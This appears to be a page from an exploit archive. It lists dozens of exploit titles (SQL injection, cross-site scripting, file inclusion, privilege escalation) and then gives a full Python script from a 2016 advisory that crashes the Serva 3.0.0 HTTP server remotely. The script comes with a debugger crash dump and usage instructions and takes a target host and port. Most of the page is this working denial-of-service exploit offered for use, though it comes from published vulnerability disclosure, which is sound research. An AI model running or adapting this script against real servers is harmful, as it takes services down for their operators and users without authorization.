
7 new exploits Microsoft Internet Explorer 9 IEFRAME - CSelectionInteractButtonBehavior::_UpdateButtonLocation Use-After-Free (MS13-047) Xitami Web Server 5.0a0 - Denial of Service OpenSSL 1.1.0a/1.1.0b - Denial of Service Serva 3.0.0 HTTP Server - Denial of Service iOS 10.1.x - Certificate File Memory Corruption OpenBSD 4.0 - (vga) Privilege Escalation OpenBSD 4.0 - 'vga' Privilege Escalation 10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections AShop Deluxe 4.x - (catalogue.php cat) SQL Injection AShop Deluxe 4.x - 'catalogue.php' SQL Injection HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion CAT2 - (spaw_root) Local File Inclusion CAT2 - 'spaw_root' Parameter Local File Inclusion MyBloggie 2.1.3 - search.php SQL Injection MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting MyBloggie 2.1.x - Multiple Remote File Inclusion MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting Smart Guard Network Manager 6.3.2 - SQL Injection WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery
72 lines
2.9 KiB
Python
Executable file
72 lines
2.9 KiB
Python
Executable file
#!/usr/bin/env python
|
|
#
|
|
#
|
|
# Serva 3.0.0 HTTP Server Module Remote Denial of Service Exploit
|
|
#
|
|
#
|
|
# Vendor: Patrick Masotta
|
|
# Product web page: http://www.vercot.com
|
|
# Affected version: 3.0.0.1001 (Community, Pro, 32/64bit)
|
|
#
|
|
# Summary: Serva is a light (~3 MB), yet powerful Microsoft Windows application.
|
|
# It was conceived mainly as an Automated PXE Server Solution Accelerator. It bundles
|
|
# on a single exe all of the underlying server protocols and services required by the
|
|
# most complex PXE network boot/install scenarios simultaneously delivering Windows and
|
|
# non-Windows assets to BIOS and UEFI based targets.
|
|
#
|
|
# Desc: The vulnerability is caused by the HTML (httpd) module and how it handles TCP requests.
|
|
# This can be exploited to cause a denial of service attack resulting in application crash.
|
|
#
|
|
# ----------------------------------------------------------------------------
|
|
#
|
|
# (c1c.4bc): C++ EH exception - code e06d7363 (first chance)
|
|
# (c1c.4bc): C++ EH exception - code e06d7363 (!!! second chance !!!)
|
|
# *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
|
|
# *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
|
|
# eax=03127510 ebx=03127670 ecx=00000003 edx=00000000 esi=03127670 edi=031276a0
|
|
# eip=74a1c54f esp=03127510 ebp=03127560 iopl=0 nv up ei pl nz ac po nc
|
|
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
|
|
# KERNELBASE!RaiseException+0x58:
|
|
# 74a1c54f c9 leave
|
|
# 0:013> kb
|
|
# # ChildEBP RetAddr Args to Child
|
|
# 00 03127560 004abaaf e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x58
|
|
# WARNING: Stack unwind information not available. Following frames may be wrong.
|
|
# 01 03127598 004cc909 031275b8 005e13e8 6ca23755 Serva32+0xabaaf
|
|
# 02 03127608 004085d3 0211ecf8 03127670 ffffffff Serva32+0xcc909
|
|
# 03 0312761c 004089a5 031276a0 fffffffd 00000004 Serva32+0x85d3
|
|
# 04 0312764c 00408f01 03127670 fffffffd 00000004 Serva32+0x89a5
|
|
# 05 03127698 00413b38 00000000 0040007a 00000000 Serva32+0x8f01
|
|
# 06 031277d8 00000000 00000000 00000000 00000000 Serva32+0x13b38
|
|
#
|
|
# ----------------------------------------------------------------------------
|
|
#
|
|
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2016-5378
|
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5378.php
|
|
#
|
|
#
|
|
# 17.11.2016
|
|
#
|
|
|
|
import sys,socket
|
|
|
|
if len(sys.argv) < 3:
|
|
|
|
print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
|
|
print 'Example: ' + sys.argv[0] + ' 172.19.0.214 80\n'
|
|
sys.exit(0)
|
|
|
|
host = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
connect = s.connect((host, port))
|
|
s.settimeout(251)
|
|
s.send('z')
|
|
s.close
|